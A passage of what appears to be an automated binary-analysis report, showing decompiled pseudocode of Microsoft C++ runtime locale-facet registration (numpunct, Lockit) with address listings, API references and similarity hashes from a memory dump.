                                                                                                				_t159 =  *0xfd0afc; // 0x0
                                                                                                				_v4 = _v4 & 0x00000000;
                                                                                                				_v16 = _t159;
                                                                                                				_t57 = E00F78A40(_a8, E00F789D0());
                                                                                                				_t154 = _t57;
                                                                                                				if(_t57 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E( &_v20);
                                                                                                					return E00FB388C(_t154);
                                                                                                				} else {
                                                                                                					if(_t159 == 0) {
                                                                                                						_push(_a8);
                                                                                                						_push( &_v16);
                                                                                                						__eflags = E00F88B3E(_t152, _t154, _t159, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t154, _t159);
                                                                                                							E00F856E6( &_v20, 0);
                                                                                                							_t160 =  *0xfd0b18; // 0x0
                                                                                                							_v4 = _v4 & 0x00000000;
                                                                                                							_v16 = _t160;
                                                                                                							_t155 = E00F78A40(_a8, E00F789D0());
                                                                                                							__eflags = _t155;
                                                                                                							if(_t155 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E( &_v20);
                                                                                                								return E00FB388C(_t155);
                                                                                                							} else {
                                                                                                								__eflags = _t160;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push(_a8);
                                                                                                									_push( &_v16);
                                                                                                									__eflags = E00F88BB9(_t155, _t160, __eflags) - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_push(8);
                                                                                                										E00FB38B2(0xfb6ebe, _t155, _t160);
                                                                                                										E00F856E6( &_v20, 0);
                                                                                                										_t161 =  *0xfd0ae8; // 0x0
                                                                                                										_v4 = _v4 & 0x00000000;
                                                                                                										_v16 = _t161;
                                                                                                										_t156 = E00F78A40(_a8, E00F789D0());
                                                                                                										__eflags = _t156;
                                                                                                										if(_t156 != 0) {
                                                                                                											L19:
                                                                                                											E00F8573E( &_v20);
                                                                                                											return E00FB388C(_t156);
                                                                                                										} else {
                                                                                                											__eflags = _t161;
                                                                                                											if(__eflags == 0) {
                                                                                                												_push(_a8);
                                                                                                												_push( &_v16);
                                                                                                												__eflags = E00F88C25(_t156, _t161, __eflags) - 0xffffffff;
                                                                                                												if(__eflags == 0) {
                                                                                                													E00F78FE0(__eflags);
                                                                                                													asm("int3");
                                                                                                													_push(8);
                                                                                                													E00FB38B2(0xfb6ebe, _t156, _t161);
                                                                                                													E00F856E6( &_v20, 0);
                                                                                                													_t162 =  *0xfd0b1c; // 0x0
                                                                                                													_v4 = _v4 & 0x00000000;
                                                                                                													_v16 = _t162;
                                                                                                													_t157 = E00F78A40(_a8, E00F789D0());
                                                                                                													__eflags = _t157;
                                                                                                													if(_t157 != 0) {
                                                                                                														L26:
                                                                                                														E00F8573E( &_v20);
                                                                                                														return E00FB388C(_t157);
                                                                                                													} else {
                                                                                                														__eflags = _t162;
                                                                                                														if(__eflags == 0) {
                                                                                                															_push(_a8);
                                                                                                															_push( &_v16);
                                                                                                															_t95 = E00F88C91(_t157, _t162, __eflags);
                                                                                                															_pop(_t139);
                                                                                                															__eflags = _t95 - 0xffffffff;
                                                                                                															if(__eflags == 0) {
                                                                                                																E00F78FE0(__eflags);
                                                                                                																asm("int3");
                                                                                                																_push(_t162);
                                                                                                																_t163 = _t139;
                                                                                                																_t50 = _t163 + 0x10;
                                                                                                																 *_t50 =  *(_t163 + 0x10) & 0x00000000;
                                                                                                																__eflags =  *_t50;
                                                                                                																 *((intOrPtr*)(_t163 + 0x14)) = 7;
                                                                                                																 *_t163 = 0;
                                                                                                																E00F8D9F3(_v12);
                                                                                                																return _t163;
                                                                                                															} else {
                                                                                                																_t157 = _v16;
                                                                                                																_v16 = _t157;
                                                                                                																_v4 = 1;
                                                                                                																E00F85472(_t157);
                                                                                                																 *0xfb81fc();
                                                                                                																 *((intOrPtr*)( *((intOrPtr*)( *_t157 + 4))))();
                                                                                                																 *0xfd0b1c = _t157;
                                                                                                																goto L26;
                                                                                                															}
                                                                                                														} else {
                                                                                                															_t157 = _t162;
                                                                                                															goto L26;
                                                                                                														}
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t156 = _v16;
                                                                                                													_v16 = _t156;
                                                                                                													_v4 = 1;
                                                                                                													E00F85472(_t156);
                                                                                                													 *0xfb81fc();
                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t156 + 4))))();
                                                                                                													 *0xfd0ae8 = _t156;
                                                                                                													goto L19;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t156 = _t161;
                                                                                                												goto L19;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t155 = _v16;
                                                                                                										_v16 = _t155;
                                                                                                										_v4 = 1;
                                                                                                										E00F85472(_t155);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t155 + 4))))();
                                                                                                										 *0xfd0b18 = _t155;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t155 = _t160;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t154 = _v16;
                                                                                                							_v16 = _t154;
                                                                                                							_v4 = 1;
                                                                                                							E00F85472(_t154);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t154 + 4))))();
                                                                                                							 *0xfd0afc = _t154;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t154 = _t159;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}



















                                                                                                0x00f8782b
                                                                                                0x00f87832
                                                                                                0x00f8783c
                                                                                                0x00f87841
                                                                                                0x00f8784c
                                                                                                0x00f87850
                                                                                                0x00f8785c
                                                                                                0x00f87861
                                                                                                0x00f87865
                                                                                                0x00f878aa
                                                                                                0x00f878ad
                                                                                                0x00f878b9
                                                                                                0x00f87867
                                                                                                0x00f87869
                                                                                                0x00f8786f
                                                                                                0x00f87875
                                                                                                0x00f8787d
                                                                                                0x00f87880
                                                                                                0x00f878ba
                                                                                                0x00f878bf
                                                                                                0x00f878c0
                                                                                                0x00f878c7
                                                                                                0x00f878d1
                                                                                                0x00f878d6
                                                                                                0x00f878e1
                                                                                                0x00f878e5
                                                                                                0x00f878f6
                                                                                                0x00f878f8
                                                                                                0x00f878fa
                                                                                                0x00f8793f
                                                                                                0x00f87942
                                                                                                0x00f8794e
                                                                                                0x00f878fc
                                                                                                0x00f878fc
                                                                                                0x00f878fe
                                                                                                0x00f87904
                                                                                                0x00f8790a
                                                                                                0x00f87912
                                                                                                0x00f87915
                                                                                                0x00f8794f
                                                                                                0x00f87954
                                                                                                0x00f87955
                                                                                                0x00f8795c
                                                                                                0x00f87966
                                                                                                0x00f8796b
                                                                                                0x00f87976
                                                                                                0x00f8797a
                                                                                                0x00f8798b
                                                                                                0x00f8798d
                                                                                                0x00f8798f
                                                                                                0x00f879d4
                                                                                                0x00f879d7
                                                                                                0x00f879e3
                                                                                                0x00f87991
                                                                                                0x00f87991
                                                                                                0x00f87993
                                                                                                0x00f87999
                                                                                                0x00f8799f
                                                                                                0x00f879a7
                                                                                                0x00f879aa
                                                                                                0x00f879e4
                                                                                                0x00f879e9
                                                                                                0x00f879ea
                                                                                                0x00f879f1
                                                                                                0x00f879fb
                                                                                                0x00f87a00
                                                                                                0x00f87a0b
                                                                                                0x00f87a0f
                                                                                                0x00f87a20
                                                                                                0x00f87a22
                                                                                                0x00f87a24
                                                                                                0x00f87a69
                                                                                                0x00f87a6c
                                                                                                0x00f87a78
                                                                                                0x00f87a26
                                                                                                0x00f87a26
                                                                                                0x00f87a28
                                                                                                0x00f87a2e
                                                                                                0x00f87a34
                                                                                                0x00f87a35
                                                                                                0x00f87a3b
                                                                                                0x00f87a3c
                                                                                                0x00f87a3f
                                                                                                0x00f87a79
                                                                                                0x00f87a7e
                                                                                                0x00f87a82
                                                                                                0x00f87a86
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8e
                                                                                                0x00f87a95
                                                                                                0x00f87a98
                                                                                                0x00f87aa1
                                                                                                0x00f87a41
                                                                                                0x00f87a41
                                                                                                0x00f87a44
                                                                                                0x00f87a48
                                                                                                0x00f87a4c
                                                                                                0x00f87a59
                                                                                                0x00f87a61
                                                                                                0x00f87a63
                                                                                                0x00000000
                                                                                                0x00f87a63
                                                                                                0x00f87a2a
                                                                                                0x00f87a2a
                                                                                                0x00000000
                                                                                                0x00f87a2a
                                                                                                0x00f87a28
                                                                                                0x00f879ac
                                                                                                0x00f879ac
                                                                                                0x00f879af
                                                                                                0x00f879b3
                                                                                                0x00f879b7
                                                                                                0x00f879c4
                                                                                                0x00f879cc
                                                                                                0x00f879ce
                                                                                                0x00000000
                                                                                                0x00f879ce
                                                                                                0x00f87995
                                                                                                0x00f87995
                                                                                                0x00000000
                                                                                                0x00f87995
                                                                                                0x00f87993
                                                                                                0x00f87917
                                                                                                0x00f87917
                                                                                                0x00f8791a
                                                                                                0x00f8791e
                                                                                                0x00f87922
                                                                                                0x00f8792f
                                                                                                0x00f87937
                                                                                                0x00f87939
                                                                                                0x00000000
                                                                                                0x00f87939
                                                                                                0x00f87900
                                                                                                0x00f87900
                                                                                                0x00000000
                                                                                                0x00f87900
                                                                                                0x00f878fe
                                                                                                0x00f87882
                                                                                                0x00f87882
                                                                                                0x00f87885
                                                                                                0x00f87889
                                                                                                0x00f8788d
                                                                                                0x00f8789a
                                                                                                0x00f878a2
                                                                                                0x00f878a4
                                                                                                0x00000000
                                                                                                0x00f878a4
                                                                                                0x00f8786b
                                                                                                0x00f8786b
                                                                                                0x00000000
                                                                                                0x00f8786b
                                                                                                0x00f87869

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F87832
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F8783C
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • numpunct.LIBCPMT ref: 00F87876
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F8788D
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F878AD
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                • String ID:
                                                                                                • API String ID: 743221004-0
                                                                                                • Opcode ID: e4816c85aab614622cd12d2a8034632dece9595a0b5276adc7163ba8b653350d
                                                                                                • Instruction ID: 7c5d156b71a7aab69e157adc644bfda9b044e5b6864c0ba831991dd55164633c
                                                                                                • Opcode Fuzzy Hash: e4816c85aab614622cd12d2a8034632dece9595a0b5276adc7163ba8b653350d
                                                                                                • Instruction Fuzzy Hash: 9701A1369042199BCB04FB64CC497EEB7A1AF84760F24411AF40167391DF78DA02FB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E00F87005(void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
                                                                                                				signed int _v4;
                                                                                                				signed int _v16;
                                                                                                				char _v20;
                                                                                                				intOrPtr _v68;
                                                                                                				signed int _t225;
                                                                                                				void* _t417;
                                                                                                				short* _t601;
                                                                                                				void* _t656;
                                                                                                				signed int _t659;
                                                                                                				signed int _t660;
                                                                                                				signed int _t661;
                                                                                                				signed int _t662;
                                                                                                				signed int _t663;
                                                                                                				signed int _t664;
                                                                                                				signed int _t665;
                                                                                                				signed int _t666;
                                                                                                				signed int _t667;
                                                                                                				signed int _t668;
                                                                                                				signed int _t669;
                                                                                                				signed int _t670;
                                                                                                				signed int _t671;
                                                                                                				signed int _t672;
                                                                                                				signed int _t673;
                                                                                                				signed int _t674;
                                                                                                				signed int _t675;
                                                                                                				signed int _t677;
                                                                                                				signed int _t678;
                                                                                                				signed int _t679;
                                                                                                				signed int _t680;
                                                                                                				signed int _t681;
                                                                                                				signed int _t682;
                                                                                                				signed int _t683;
                                                                                                				signed int _t684;
                                                                                                				signed int _t685;
                                                                                                				signed int _t686;
                                                                                                				signed int _t687;
                                                                                                				signed int _t688;
                                                                                                				signed int _t689;
                                                                                                				signed int _t690;
                                                                                                				signed int _t691;
                                                                                                				signed int _t692;
                                                                                                				signed int _t693;
                                                                                                				signed int _t694;
                                                                                                				short* _t695;
                                                                                                
                                                                                                				_t656 = __edx;
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6( &_v20, 0);
                                                                                                				_t677 =  *0xfd0ad0; // 0x0
                                                                                                				_v4 = _v4 & 0x00000000;
                                                                                                				_v16 = _t677;
                                                                                                				_t225 = E00F78A40(_a8, E00F789D0());
                                                                                                				_t658 = _t225;
                                                                                                				if(_t225 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E( &_v20);
                                                                                                					return E00FB388C(_t658);
                                                                                                				} else {
                                                                                                					if(_t677 == 0) {
                                                                                                						_push(_a8);
                                                                                                						_push( &_v16);
                                                                                                						__eflags = E00F884DA(_t656, _t658, _t677, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t658, _t677);
                                                                                                							E00F856E6( &_v20, 0);
                                                                                                							_t678 =  *0xfd0af0; // 0x0
                                                                                                							_v4 = _v4 & 0x00000000;
                                                                                                							_v16 = _t678;
                                                                                                							_t659 = E00F78A40(_a8, E00F789D0());
                                                                                                							__eflags = _t659;
                                                                                                							if(_t659 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E( &_v20);
                                                                                                								return E00FB388C(_t659);
                                                                                                							} else {
                                                                                                								__eflags = _t678;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push(_a8);
                                                                                                									_push( &_v16);
                                                                                                									__eflags = E00F8857C(_t659, _t678, __eflags) - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_push(8);
                                                                                                										E00FB38B2(0xfb6ebe, _t659, _t678);
                                                                                                										E00F856E6( &_v20, 0);
                                                                                                										_t679 =  *0xfd0b04; // 0x0
                                                                                                										_v4 = _v4 & 0x00000000;
                                                                                                										_v16 = _t679;
                                                                                                										_t660 = E00F78A40(_a8, E00F789D0());
                                                                                                										__eflags = _t660;
                                                                                                										if(_t660 != 0) {
                                                                                                											L19:
                                                                                                											E00F8573E( &_v20);
                                                                                                											return E00FB388C(_t660);
                                                                                                										} else {
                                                                                                											__eflags = _t679;
                                                                                                											if(__eflags == 0) {
                                                                                                												_push(_a8);
                                                                                                												_push( &_v16);
                                                                                                												__eflags = E00F885EC(_t660, _t679, __eflags) - 0xffffffff;
                                                                                                												if(__eflags == 0) {
                                                                                                													E00F78FE0(__eflags);
                                                                                                													asm("int3");
                                                                                                													_push(8);
                                                                                                													E00FB38B2(0xfb6ebe, _t660, _t679);
                                                                                                													E00F856E6( &_v20, 0);
                                                                                                													_t680 =  *0xfd0ad4; // 0x0
                                                                                                													_v4 = _v4 & 0x00000000;
                                                                                                													_v16 = _t680;
                                                                                                													_t661 = E00F78A40(_a8, E00F789D0());
                                                                                                													__eflags = _t661;
                                                                                                													if(_t661 != 0) {
                                                                                                														L26:
                                                                                                														E00F8573E( &_v20);
                                                                                                														return E00FB388C(_t661);
                                                                                                													} else {
                                                                                                														__eflags = _t680;
                                                                                                														if(__eflags == 0) {
                                                                                                															_push(_a8);
                                                                                                															_push( &_v16);
                                                                                                															__eflags = E00F88654(_t661, _t680, __eflags) - 0xffffffff;
                                                                                                															if(__eflags == 0) {
                                                                                                																E00F78FE0(__eflags);
                                                                                                																asm("int3");
                                                                                                																_push(8);
                                                                                                																E00FB38B2(0xfb6ebe, _t661, _t680);
                                                                                                																E00F856E6( &_v20, 0);
                                                                                                																_t681 =  *0xfd0b08; // 0x0
                                                                                                																_v4 = _v4 & 0x00000000;
                                                                                                																_v16 = _t681;
                                                                                                																_t662 = E00F78A40(_a8, E00F789D0());
                                                                                                																__eflags = _t662;
                                                                                                																if(_t662 != 0) {
                                                                                                																	L33:
                                                                                                																	E00F8573E( &_v20);
                                                                                                																	return E00FB388C(_t662);
                                                                                                																} else {
                                                                                                																	__eflags = _t681;
                                                                                                																	if(__eflags == 0) {
                                                                                                																		_push(_a8);
                                                                                                																		_push( &_v16);
                                                                                                																		__eflags = E00F886BC(_t662, _t681, __eflags) - 0xffffffff;
                                                                                                																		if(__eflags == 0) {
                                                                                                																			E00F78FE0(__eflags);
                                                                                                																			asm("int3");
                                                                                                																			_push(8);
                                                                                                																			E00FB38B2(0xfb6ebe, _t662, _t681);
                                                                                                																			E00F856E6( &_v20, 0);
                                                                                                																			_t682 =  *0xfd0ad8; // 0x0
                                                                                                																			_v4 = _v4 & 0x00000000;
                                                                                                																			_v16 = _t682;
                                                                                                																			_t663 = E00F78A40(_a8, E00F789D0());
                                                                                                																			__eflags = _t663;
                                                                                                																			if(_t663 != 0) {
                                                                                                																				L40:
                                                                                                																				E00F8573E( &_v20);
                                                                                                																				return E00FB388C(_t663);
                                                                                                																			} else {
                                                                                                																				__eflags = _t682;
                                                                                                																				if(__eflags == 0) {
                                                                                                																					_push(_a8);
                                                                                                																					_push( &_v16);
                                                                                                																					__eflags = E00F88724(_t663, _t682, __eflags) - 0xffffffff;
                                                                                                																					if(__eflags == 0) {
                                                                                                																						E00F78FE0(__eflags);
                                                                                                																						asm("int3");
                                                                                                																						_push(8);
                                                                                                																						E00FB38B2(0xfb6ebe, _t663, _t682);
                                                                                                																						E00F856E6( &_v20, 0);
                                                                                                																						_t683 =  *0xfd0b0c; // 0x0
                                                                                                																						_v4 = _v4 & 0x00000000;
                                                                                                																						_v16 = _t683;
                                                                                                																						_t664 = E00F78A40(_a8, E00F789D0());
                                                                                                																						__eflags = _t664;
                                                                                                																						if(_t664 != 0) {
                                                                                                																							L47:
                                                                                                																							E00F8573E( &_v20);
                                                                                                																							return E00FB388C(_t664);
                                                                                                																						} else {
                                                                                                																							__eflags = _t683;
                                                                                                																							if(__eflags == 0) {
                                                                                                																								_push(_a8);
                                                                                                																								_push( &_v16);
                                                                                                																								__eflags = E00F8878C(_t664, _t683, __eflags) - 0xffffffff;
                                                                                                																								if(__eflags == 0) {
                                                                                                																									E00F78FE0(__eflags);
                                                                                                																									asm("int3");
                                                                                                																									_push(8);
                                                                                                																									E00FB38B2(0xfb6ebe, _t664, _t683);
                                                                                                																									E00F856E6( &_v20, 0);
                                                                                                																									_t684 =  *0xfd0adc; // 0x0
                                                                                                																									_v4 = _v4 & 0x00000000;
                                                                                                																									_v16 = _t684;
                                                                                                																									_t665 = E00F78A40(_a8, E00F789D0());
                                                                                                																									__eflags = _t665;
                                                                                                																									if(_t665 != 0) {
                                                                                                																										L54:
                                                                                                																										E00F8573E( &_v20);
                                                                                                																										return E00FB388C(_t665);
                                                                                                																									} else {
                                                                                                																										__eflags = _t684;
                                                                                                																										if(__eflags == 0) {
                                                                                                																											_push(_a8);
                                                                                                																											_push( &_v16);
                                                                                                																											__eflags = E00F887F4(_t665, _t684, __eflags) - 0xffffffff;
                                                                                                																											if(__eflags == 0) {
                                                                                                																												E00F78FE0(__eflags);
                                                                                                																												asm("int3");
                                                                                                																												_push(8);
                                                                                                																												E00FB38B2(0xfb6ebe, _t665, _t684);
                                                                                                																												E00F856E6( &_v20, 0);
                                                                                                																												_t685 =  *0xfd0b14; // 0x0
                                                                                                																												_v4 = _v4 & 0x00000000;
                                                                                                																												_v16 = _t685;
                                                                                                																												_t666 = E00F78A40(_a8, E00F789D0());
                                                                                                																												__eflags = _t666;
                                                                                                																												if(_t666 != 0) {
                                                                                                																													L61:
                                                                                                																													E00F8573E( &_v20);
                                                                                                																													return E00FB388C(_t666);
                                                                                                																												} else {
                                                                                                																													__eflags = _t685;
                                                                                                																													if(__eflags == 0) {
                                                                                                																														_push(_a8);
                                                                                                																														_push( &_v16);
                                                                                                																														__eflags = E00F8885C(_t666, _t685, __eflags) - 0xffffffff;
                                                                                                																														if(__eflags == 0) {
                                                                                                																															E00F78FE0(__eflags);
                                                                                                																															asm("int3");
                                                                                                																															_push(8);
                                                                                                																															E00FB38B2(0xfb6ebe, _t666, _t685);
                                                                                                																															E00F856E6( &_v20, 0);
                                                                                                																															_t686 =  *0xfd0b10; // 0x0
                                                                                                																															_v4 = _v4 & 0x00000000;
                                                                                                																															_v16 = _t686;
                                                                                                																															_t667 = E00F78A40(_a8, E00F789D0());
                                                                                                																															__eflags = _t667;
                                                                                                																															if(_t667 != 0) {
                                                                                                																																L68:
                                                                                                																																E00F8573E( &_v20);
                                                                                                																																return E00FB388C(_t667);
                                                                                                																															} else {
                                                                                                																																__eflags = _t686;
                                                                                                																																if(__eflags == 0) {
                                                                                                																																	_push(_a8);
                                                                                                																																	_push( &_v16);
                                                                                                																																	__eflags = E00F888E0(_t667, _t686, __eflags) - 0xffffffff;
                                                                                                																																	if(__eflags == 0) {
                                                                                                																																		E00F78FE0(__eflags);
                                                                                                																																		asm("int3");
                                                                                                																																		_push(8);
                                                                                                																																		E00FB38B2(0xfb6ebe, _t667, _t686);
                                                                                                																																		E00F856E6( &_v20, 0);
                                                                                                																																		_t687 =  *0xfd0ae4; // 0x0
                                                                                                																																		_v4 = _v4 & 0x00000000;
                                                                                                																																		_v16 = _t687;
                                                                                                																																		_t668 = E00F78A40(_a8, E00F789D0());
                                                                                                																																		__eflags = _t668;
                                                                                                																																		if(_t668 != 0) {
                                                                                                																																			L75:
                                                                                                																																			E00F8573E( &_v20);
                                                                                                																																			return E00FB388C(_t668);
                                                                                                																																		} else {
                                                                                                																																			__eflags = _t687;
                                                                                                																																			if(__eflags == 0) {
                                                                                                																																				_push(_a8);
                                                                                                																																				_push( &_v16);
                                                                                                																																				__eflags = E00F88965(_t668, _t687, __eflags) - 0xffffffff;
                                                                                                																																				if(__eflags == 0) {
                                                                                                																																					E00F78FE0(__eflags);
                                                                                                																																					asm("int3");
                                                                                                																																					_push(8);
                                                                                                																																					E00FB38B2(0xfb6ebe, _t668, _t687);
                                                                                                																																					E00F856E6( &_v20, 0);
                                                                                                																																					_t688 =  *0xfd0ae0; // 0x0
                                                                                                																																					_v4 = _v4 & 0x00000000;
                                                                                                																																					_v16 = _t688;
                                                                                                																																					_t669 = E00F78A40(_a8, E00F789D0());
                                                                                                																																					__eflags = _t669;
                                                                                                																																					if(_t669 != 0) {
                                                                                                																																						L82:
                                                                                                																																						E00F8573E( &_v20);
                                                                                                																																						return E00FB388C(_t669);
                                                                                                																																					} else {
                                                                                                																																						__eflags = _t688;
                                                                                                																																						if(__eflags == 0) {
                                                                                                																																							_push(_a8);
                                                                                                																																							_push( &_v16);
                                                                                                																																							__eflags = E00F889E9(_t669, _t688, __eflags) - 0xffffffff;
                                                                                                																																							if(__eflags == 0) {
                                                                                                																																								E00F78FE0(__eflags);
                                                                                                																																								asm("int3");
                                                                                                																																								_push(8);
                                                                                                																																								E00FB38B2(0xfb6ebe, _t669, _t688);
                                                                                                																																								E00F856E6( &_v20, 0);
                                                                                                																																								_t689 =  *0xfd0af4; // 0x0
                                                                                                																																								_v4 = _v4 & 0x00000000;
                                                                                                																																								_v16 = _t689;
                                                                                                																																								_t670 = E00F78A40(_a8, E00F789D0());
                                                                                                																																								__eflags = _t670;
                                                                                                																																								if(_t670 != 0) {
                                                                                                																																									L89:
                                                                                                																																									E00F8573E( &_v20);
                                                                                                																																									return E00FB388C(_t670);
                                                                                                																																								} else {
                                                                                                																																									__eflags = _t689;
                                                                                                																																									if(__eflags == 0) {
                                                                                                																																										_push(_a8);
                                                                                                																																										_push( &_v16);
                                                                                                																																										__eflags = E00F88A6E(_t670, _t689, __eflags) - 0xffffffff;
                                                                                                																																										if(__eflags == 0) {
                                                                                                																																											E00F78FE0(__eflags);
                                                                                                																																											asm("int3");
                                                                                                																																											_push(8);
                                                                                                																																											E00FB38B2(0xfb6ebe, _t670, _t689);
                                                                                                																																											E00F856E6( &_v20, 0);
                                                                                                																																											_t690 =  *0xfd0af8; // 0x0
                                                                                                																																											_v4 = _v4 & 0x00000000;
                                                                                                																																											_v16 = _t690;
                                                                                                																																											_t671 = E00F78A40(_a8, E00F789D0());
                                                                                                																																											__eflags = _t671;
                                                                                                																																											if(_t671 != 0) {
                                                                                                																																												L96:
                                                                                                																																												E00F8573E( &_v20);
                                                                                                																																												return E00FB388C(_t671);
                                                                                                																																											} else {
                                                                                                																																												__eflags = _t690;
                                                                                                																																												if(__eflags == 0) {
                                                                                                																																													_push(_a8);
                                                                                                																																													_push( &_v16);
                                                                                                																																													__eflags = E00F88AD6(_t671, _t690, __eflags) - 0xffffffff;
                                                                                                																																													if(__eflags == 0) {
                                                                                                																																														E00F78FE0(__eflags);
                                                                                                																																														asm("int3");
                                                                                                																																														_push(8);
                                                                                                																																														E00FB38B2(0xfb6ebe, _t671, _t690);
                                                                                                																																														E00F856E6( &_v20, 0);
                                                                                                																																														_t691 =  *0xfd0afc; // 0x0
                                                                                                																																														_v4 = _v4 & 0x00000000;
                                                                                                																																														_v16 = _t691;
                                                                                                																																														_t672 = E00F78A40(_a8, E00F789D0());
                                                                                                																																														__eflags = _t672;
                                                                                                																																														if(_t672 != 0) {
                                                                                                																																															L103:
                                                                                                																																															E00F8573E( &_v20);
                                                                                                																																															return E00FB388C(_t672);
                                                                                                																																														} else {
                                                                                                																																															__eflags = _t691;
                                                                                                																																															if(__eflags == 0) {
                                                                                                																																																_push(_a8);
                                                                                                																																																_push( &_v16);
                                                                                                																																																__eflags = E00F88B3E(_t656, _t672, _t691, __eflags) - 0xffffffff;
                                                                                                																																																if(__eflags == 0) {
                                                                                                																																																	E00F78FE0(__eflags);
                                                                                                																																																	asm("int3");
                                                                                                																																																	_push(8);
                                                                                                																																																	E00FB38B2(0xfb6ebe, _t672, _t691);
                                                                                                																																																	E00F856E6( &_v20, 0);
                                                                                                																																																	_t692 =  *0xfd0b18; // 0x0
                                                                                                																																																	_v4 = _v4 & 0x00000000;
                                                                                                																																																	_v16 = _t692;
                                                                                                																																																	_t673 = E00F78A40(_a8, E00F789D0());
                                                                                                																																																	__eflags = _t673;
                                                                                                																																																	if(_t673 != 0) {
                                                                                                																																																		L110:
                                                                                                																																																		E00F8573E( &_v20);
                                                                                                																																																		return E00FB388C(_t673);
                                                                                                																																																	} else {
                                                                                                																																																		__eflags = _t692;
                                                                                                																																																		if(__eflags == 0) {
                                                                                                																																																			_push(_a8);
                                                                                                																																																			_push( &_v16);
                                                                                                																																																			__eflags = E00F88BB9(_t673, _t692, __eflags) - 0xffffffff;
                                                                                                																																																			if(__eflags == 0) {
                                                                                                																																																				E00F78FE0(__eflags);
                                                                                                																																																				asm("int3");
                                                                                                																																																				_push(8);
                                                                                                																																																				E00FB38B2(0xfb6ebe, _t673, _t692);
                                                                                                																																																				E00F856E6( &_v20, 0);
                                                                                                																																																				_t693 =  *0xfd0ae8; // 0x0
                                                                                                																																																				_v4 = _v4 & 0x00000000;
                                                                                                																																																				_v16 = _t693;
                                                                                                																																																				_t674 = E00F78A40(_a8, E00F789D0());
                                                                                                																																																				__eflags = _t674;
                                                                                                																																																				if(_t674 != 0) {
                                                                                                																																																					L117:
                                                                                                																																																					E00F8573E( &_v20);
                                                                                                																																																					return E00FB388C(_t674);
                                                                                                																																																				} else {
                                                                                                																																																					__eflags = _t693;
                                                                                                																																																					if(__eflags == 0) {
                                                                                                																																																						_push(_a8);
                                                                                                																																																						_push( &_v16);
                                                                                                																																																						__eflags = E00F88C25(_t674, _t693, __eflags) - 0xffffffff;
                                                                                                																																																						if(__eflags == 0) {
                                                                                                																																																							E00F78FE0(__eflags);
                                                                                                																																																							asm("int3");
                                                                                                																																																							_push(8);
                                                                                                																																																							E00FB38B2(0xfb6ebe, _t674, _t693);
                                                                                                																																																							E00F856E6( &_v20, 0);
                                                                                                																																																							_t694 =  *0xfd0b1c; // 0x0
                                                                                                																																																							_v4 = _v4 & 0x00000000;
                                                                                                																																																							_v16 = _t694;
                                                                                                																																																							_t675 = E00F78A40(_a8, E00F789D0());
                                                                                                																																																							__eflags = _t675;
                                                                                                																																																							if(_t675 != 0) {
                                                                                                																																																								L124:
                                                                                                																																																								E00F8573E( &_v20);
                                                                                                																																																								return E00FB388C(_t675);
                                                                                                																																																							} else {
                                                                                                																																																								__eflags = _t694;
                                                                                                																																																								if(__eflags == 0) {
                                                                                                																																																									_push(_a8);
                                                                                                																																																									_push( &_v16);
                                                                                                																																																									_t417 = E00F88C91(_t675, _t694, __eflags);
                                                                                                																																																									_pop(_t601);
                                                                                                																																																									__eflags = _t417 - 0xffffffff;
                                                                                                																																																									if(__eflags == 0) {
                                                                                                																																																										E00F78FE0(__eflags);
                                                                                                																																																										asm("int3");
                                                                                                																																																										_push(_t694);
